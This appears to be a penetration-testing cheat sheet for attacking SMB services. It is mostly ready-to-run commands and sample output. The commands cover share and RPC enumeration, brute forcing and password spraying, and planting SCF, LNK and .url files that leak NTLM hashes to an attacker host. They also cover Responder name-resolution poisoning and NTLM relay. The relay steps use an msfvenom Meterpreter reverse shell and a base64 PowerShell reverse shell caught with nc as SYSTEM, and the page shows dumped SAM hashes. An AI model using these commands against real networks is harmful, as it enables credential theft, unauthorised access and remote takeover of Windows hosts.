139,445 - SMB

Usage

# Download all files without prompting
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

# Mount a share (no authentication)
sudo mount -t cifs //10.10.10.10/target-share /mnt
sudo mount -t cifs - "username='',password=''" //10.10.10.10/my_share /mnt

# Mount a share (with authentication)
sudo mount -t cifs -o username=x7331,password=Pass123! //10.10.10.10/my_share /path/to/mount

Launch SMB server on the attacking host:

impacket-smbserver -smb2support share . -username test -password tes

Connect from the target and transfer the file(s):

# Map the share
net use z: \\10.10.10.10\share /USER:test test

# Transfer the file(s)
copy my_file z:\

smbmap is a tool for quickly enumerating SMB shares and their permissions, revealing accessible directories and files to identify misconfigurations or sensitive data exposure.

# List shares and permissions
smbmap -H 10.10.10.10

# List share's contents
smbmap -H 10.10.10.10 -r my_share

# Spider the share
smbmap -u x7331 -p Passw0rd123! -H 10.10.10.10 -r my_share --depth 3

# Download a file
smbmap -H 10.10.10.10 --download "my_share\target_file"

# Upload a file
smbmap -H 10.10.10.10 --upload target_file "my_share\target_file"

smbclient is a command-line utility for interacting with SMB shares, allowing authentication, navigation, and file operations, making it useful for both enumeration and exploitation.

# List shares via a null session
smbclient -N -L //10.10.10.10

# Connect to a share
smbclient -U user //10.129.42.253/my_share
smbclient //target/my_share -U "domain\x7331%Password123\!"

Remote Procedure Call (RPC) is a protocol that enables communication and execution of functions on remote systems. It can be leveraged to enumerate services, query system information, and interact with administrative interfaces on Windows hosts, providing insight into target configurations and potential attack paths without requiring direct login.

# Connect via a null session
rpcclient -U "" -N 10.10.10.10

RPC can be used for enumeration tasks:

# System information
srvinfo

# Enumerate everything
netshareenumall

# Enumerate users
enumdomusers

# Enumerate the SID of a user
lookupnames user

# Enumerate user information
queryuser RID

# Enumerate groups
enumalsgroups

# Enumerate local groups
enumalsgroups builtin

# Enumerate domains
enumdomains

# Enumerate privileges
enumprivs

# Enumerate the password policy
getusrdompwinfo 1000

It can also be used for certain operations:

# Create a new user
createdomuser user1

# Set user's password
setuserinfo2 x7331 24 'Pass123!'

# Change a user's password
setuserinfo2 x7331 23 'ComplexP4ssw0rd!'
chgpasswd3 x7331 <old-password> <new-password>

# Create a new share
netshareadd "C:\Windows" "Windows" 10 "my_share"

# List directory permissions
smbcacls -N '//10.10.10.10/my_share' /my_directory

# # List directory permissions recursively
for i in $(ls); do echo $i; smbcacls -N '//10.10.10.103/my_share' /my_dir/$i ; done

Enumeration

enum4linux-ng is a Python rewrite of the original enum4linux.pl, designed to automate information gathering from Windows and Samba systems. It wraps around nmblookup, net, rpcclient, and smbclient to extract usernames, groups, shares, domain details, and password policies, providing structured output that accelerates Active Directory and SMB reconnaissance.

enum4linux-ng 172.16.10.3

impacket-samrdump uses the SAMR protocol to enumerate users, groups, and policy data from Windows or domain controllers. By leveraging Impacket, it exposes domain account structures without requiring administrative privileges, making it effective for mapping Active Directory environments and identifying potential escalation paths.

impacket-samrdump 172.16.10.3

Attacks

Passwords

# BFA with wordlists
hydra -L <user-list> -P <pass-list> smb://<target-ip>

# BFA a target user
hydra -l <username> -P <pass-list> smb://<target-ip>

We can password spray with nxc:

# Domain
nxc smb 172.16.10.3 -u <user-list> -p Password123! --continue-on-success

# Local
nxc smb 172.16.10.3 -u <user-list> -p Password123! --continue-on-success --local-auth

hydra defaults on attacking the domain. To force local authentication we must prepend the local machine name (e.g. DC01) or .\ to the username in our userlist. For instance, DC01\Administrator or .\Administrator.

# Domain
hydra -U <user-wordlist> -p <pass> smb://<target-ip>

Hashes

All described methods (SCF, LNK, SC) require WRITE access to a share/directory:

If WRITE access to a share is available, NetExec modules can be used for automation.
If WRITE access is only available within a READABLE share, the process must be done manually.

For stealing the hash, the user must only browse the share, not interact with the file.

Share permissions can be configured to only allow folders to be created, not files; nxc will flag WRITE access in those cases.

Requires WRITE access to the Users share!

The Shell Command File (SCF) is a Windows file format used to define simple Explorer shell commands — kind of like shortcuts, but more primitive (read more here).

# Create the SCF file
nxc smb <target-ip> -u 'guest' -p '' -M scuffy -o NAME=README SERVER=<smb-server-ip>

Monitor the traffic (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u 'guest' -p '' -M scuffy -o NAME=README SERVER=<smb-server-ip> CLEANUP=True

If a share is locally mounted and WRITE access is available for the SMB/Users/WritableDir folder, but not for the Users share, we can create an SCF file:

[Shell]
Command=2
IconFile=\\10.10.10.10\share\test.io
[Taskbar]
Command=ToggleDesktop

Listen:

sudo responder -I tun0

Transfer the SCF file to the writable directory:

sudo cp example.scf SMB/Users/WritableDir

A Link (LNK) file is a Windows shortcut file that points to another file, folder, or program. When opened, it tells Windows to launch the target it links to — but it can also include custom commands, making it useful for both legitimate use and malicious purposes like executing hidden payloads.

Upload a LNK file:

nxc smb <target-ip> -u <user> -p <pass> -M slinky -o SERVER=<smb-server-ip> NAME=README

Listen (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u <user> -p <pass> -M slinky -o NAME=README CLEANUP=YES

A Service Configuration (SC) file is a plain text file used to create or configure Windows services. It defines parameters like the service name, executable path, and startup settings. This is similar to the LNK method, but the URL needs to be escaped with \\ and by default it writes the file Documents in all writable shares.

Upload a SC file:

nxc smb <target-ip> -u <user> -p <pass> -M drop-sc -o URL=\\\\<smb-server-ip>\\<share_name> SHARE=<share_name> FILENAME=README

Listen (MSF's auxiliary/server/capture/smb can also be used):

sudo responder -I tun0

Clean up:

nxc smb <target-ip> -u <user> -p <pass> -M drop-sc -o CLEANUP=True FILENAME=README

A .url file is a Windows Internet Shortcut linking to a web or network resource. It stores the target URL and optional metadata, including an IconFile for a custom icon. While not executable, it can reveal user activity, mapped paths, or be abused in phishing attacks by automatically opening the linked resource.

@hax.url

[InternetShortcut]
URL=anything
WorkingDirectory=anything
IconFile=\\192.168.45.241\%USERNAME%.icon
IconIndex=1

smb: \> put @hax.url 
putting file @hax.url as \@hax.url (1.2 kb/s) (average 1.2 kb/s)

When a user opens the .url file, the system attempts to load the specified icon. This triggers a network request to the host serving the icon, typically referencing the filename with the user’s account name. The request can also carry the NTLM hash of the account, exposing credentials during the retrieval process.

ntml_theft is a tool that generates 21 different types of hash theft documents, e.g. .scf or .lnk files.

# Generate all possible files
ntlm_theft.py -g all -s <attacker-ip> -f test

# Listen
sudo responder -I tun0

# Upload the file into a writable share
nxc smb <target-ip> -u <user> -p <pass> --share <share-name> --put-file test/test.lnk test.lnk

Once a hash is obtained it can be cracked or relayed.

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou

NTLM Relay

Relay for gaining RCE with a Meterpreter listener:

# Enumerate the target hosts
nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

# Create a reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f exe > shell.exe

# Start the SMB server
sudo impacket-ntlmrelayx -tf relay.txt -e ./shell.exe

# Start the listener
$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker-ip>; set
LPORT 4444; exploit -j"

# Migrate
meterpreter > ps
meterpreter > migrate <PID>

# Enumerate the target hosts
nxc smb 172.16.10.0/24 --gen-relay-list relay.txt

# Use the MSF module to relay
$ sudo msfconsole -q -x "use exploit/windows/smb/smb_relay; set RELAY_TARGETS 172.16.10.0/14; set SRVHOST <attacker-ip>; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker-ip>; exploit -j"

Forced Authentication

The goal here is to abuse name-resolution protocols and SMB to capture NetNTLM (v1/v2) authentication material from Windows hosts, then either crack those hashes or relay them to escalate privileges.

When a Windows host resolves a hostname (for example \\mysharedfolder\), it follows roughly this order:

Hosts file — C:\Windows\System32\Drivers\etc\hosts.
Local DNS cache — answers from recently resolved names.
Configured DNS server — the domain or DHCP-assigned DNS.
Multicast name resolution — protocols like LLMNR, NBT-NS, and mDNS. This queries other devices on the same network segment.

If earlier steps fail (e.g., the user mistyped \\mysharefoder instead of \\mysharedfolder), the multicast queries are broadcast. Attackers on the same network can respond and impersonate the requested service. This is because multicast resolution protocols do not validate the authenticity of responses — they trust the first valid reply received.

We can use responder to listen for LLMNR / NBT-NS / mDNS name resolution requests and poison responses to claim names being requested by victims. Responder will reply to multicast name queries and pretend to be the target service (SMB, HTTP, etc.), causing the victim to attempt authentication to the attacker's host.

# Launch responder
$ sudo responder -I ens33

[+] Current Session Variables:                                                     
    Responder Machine Name     [WIN-2TY1Z1CIGXH]   
    Responder Domain Name      [HF2L.LOCAL]                                        
    Responder DCE-RPC Port     [48162] 

[+] Listening for events... 

[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 10.10.110.17 for name WORKGROUP (service: Browser Election)
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[*] [LLMNR]  Poisoned answer sent to 10.10.110.17 for name mysharefoder
[*] [MDNS] Poisoned answer sent to 10.10.110.17   for name mysharefoder.local
[SMB] NTLMv2-SSP Client   : 10.10.110.17
[SMB] NTLMv2-SSP Username : WIN7BOX\demouser
[SMB] NTLMv2-SSP Hash     : demouser::WIN7BOX:997...<SNIP>...000

Captured hashes are stored in Responder's logs directory (commonly /usr/share/responder/logs/).

If you notice multiple hashes for one acc this is because NTLMv2 utilises both a client-side and server-side challenge that is randomized for each interaction. This makes it so the resulting hashes that are sent are salted with a randomized string of numbers. This is why the hashes don't match but still represent the same password.

Two common options after capturing NetNTLM responses:

Crack the hash (offline) using a cracking tool such as hashcat to attempt to recover the password from the captured NetNTLM challenge/response.

$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

ADMINISTRATOR::WIN-487IMQOIA8E:997...<SNIP>...000:P@ssword

Relay the authentication (live) - forward the captured authentication attempt to another target that will accept NTLM authentication (NTLM relay). Tools like impacket-ntlmrelayx can automate this. If using Responder to capture but relaying with impacket, disable Responder's SMB listener so it does not interfere with relaying.

# Disable Responder's SMB listener
$ cat /etc/responder/Responder.conf | grep 'SMB ='

SMB = Off

impacket-ntlmrelayx will dump the SAM by default, but commands can be executed via the -c flag:

# Relay the credentials to another host
$ impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
<SNIP>

[*] Servers started, waiting for connections

[*] SMBD-Thread-3: Connection from /ADMINISTRATOR@10.10.110.1 controlled, attacking target smb://10.10.110.146
[*] Authenticating against smb://10.10.110.146 as /ADMINISTRATOR SUCCEED

<SNIP>

[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>

We can create a PowerShell reverse shell using revshells and the Powershell #3 (Base64) payload:

$ impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e JAB...<SNIP>...CkA'

Once the victim authenticates to our server, we poison the response and make it execute our command to catch the revshell:

$ nc -lvnp 9001

listening on [any] 9001 ...
connect to [10.10.110.133] from (UNKNOWN) [10.10.110.146] 52471

PS C:\Windows\system32> whoami;hostname

nt authority\system
WIN11BOX

Vulnerabilities

SMBv2 Negotiation

Windows Vista (Gold, SP1, SP2), Windows Server 2008 (Gold, SP2), and Windows 7 Release Candidate are affected by a RCE vulnerability (CVE-2009-3103), aka SMBv2 Negotiation Vulnerability, in the SMBv2 protocol implementation within srv2.sys, the kernel-mode driver responsible for SMBv2 handling in certain Microsoft Windows versions. A flaw in the processing of the Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet allows an attacker to trigger an array index error by supplying an ampersand (&) character. This malformed input leads to an out-of-bounds memory dereference in kernel space.

When exploited, it can result in either a denial of service through a system crash (blue screen) or, under certain conditions, arbitrary code execution with kernel-level privileges. The attack is conducted over TCP port 445 and does not require authentication, making it highly dangerous when SMBv2 services are exposed to untrusted networks.

A MSF module exists for exploiting the vulnerability.

 msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Previous111,2049 - NFS Next53 - DNS

Last updated 2 months ago

Was this helpful?